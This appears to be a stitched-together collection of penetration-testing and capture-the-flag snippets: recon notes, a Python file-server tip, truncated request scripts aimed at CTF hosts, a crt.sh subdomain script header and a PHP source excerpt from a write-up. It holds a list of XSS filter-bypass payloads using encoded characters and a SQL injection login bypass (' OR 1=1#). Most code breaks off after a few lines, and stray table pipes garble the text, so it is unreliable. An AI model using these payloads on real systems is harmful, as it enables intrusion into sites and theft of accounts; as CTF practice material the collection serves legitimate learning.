- Recon
- Find vuln
- Exploit
- Document it
Run unicornscan from the command line, and run nmap from inside msfconsole so that the results (loot) are stored in the database.
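Each of these commands will run an ad hoc HTTP static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely. Note that the server listens on all network interfaces by default and has no authentication, so every file in the served directory is readable by anyone who can reach the host on port 8000, not only from localhost. Stop it as soon as the transfer is done. `SimpleHTTPServer` is the Python 2 module name; on Python 3 the equivalent is `python3 -m http.server 8000 --bind 127.0.0.1`, where `--bind` restricts it to the loopback interface.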
$ python -m SimpleHTTPServer 8000
import requests | |
import re | |
# URL of the page the script sends its requests to.
url = "http://88.198.233.174:33534/index.php"

# Form fields submitted with each request.
# NOTE(review): "username" is empty here; where it gets filled in is not
# visible in this excerpt.
payload = dict(username="", password="x")
def check(data): |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
import requests | |
import re | |
#GLOBAL | |
base_url = "http://mezzanine.mysterious-hashes.net/" | |
format_flag = "flag{%s}" | |
#LEVEL 1 | |
payload = { | |
"user": "' OR 1=1#", | |
"pass": "' OR 1=1#" |
#!/bin/bash | |
# | |
# crt.sh sub-domain check by 1N3@CrowdShield | |
# https://crowdshield.com | |
# | |
OKBLUE='\033[94m' | |
OKRED='\033[91m' | |
OKGREEN='\033[92m' | |
OKORANGE='\033[93m' |
You are given a URI (everything happens under the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to `index.php`, a second URI that is the same but ends with `index.phps` and is allegedly the source code of the former, and finally `index.php` contains a link to `auth.php`.
`index.phps` listing below:
<?php
session_start();
$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);
# coding: utf-8 | |
""" | |
Unfortunately solved 20 minutes after the end of the CTF :( | |
""" | |
import re | |
import sys | |
import string | |
import requests |
from __future__ import division | |
import hashlib | |
import requests | |
from datetime import datetime, timedelta | |
# Template for the download API URL; the two "{}" placeholders are presumably
# filled with str.format at the call site (not shown in this excerpt).
api_url = "http://rfile.2017.teamrois.cn/api/download/{}/{}"
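def totimestamp(dt, epoch=datetime(1970,1,1)):
    """Return the number of seconds between *epoch* and *dt* as a float.

    Args:
        dt: The datetime to convert. It must be naive when the default
            epoch is used, because naive and aware datetimes cannot be
            subtracted from each other.
        epoch: Reference point; defaults to the naive 1970-01-01 00:00:00.

    Returns:
        Seconds elapsed from ``epoch`` to ``dt``, including the fractional
        (microsecond) part.
    """
    # timedelta.total_seconds() does the same microsecond-accurate
    # computation as the hand-written formula, and does not rely on the
    # file-level ``from __future__ import division`` to avoid truncation.
    return (dt - epoch).total_seconds()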
import requests | |
from bs4 import BeautifulSoup | |
url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/" | |
soup = BeautifulSoup(requests.get(url).text,"lxml") | |
headers = { | |
'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", | |
'content-type': "application/x-www-form-urlencoded", | |
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", |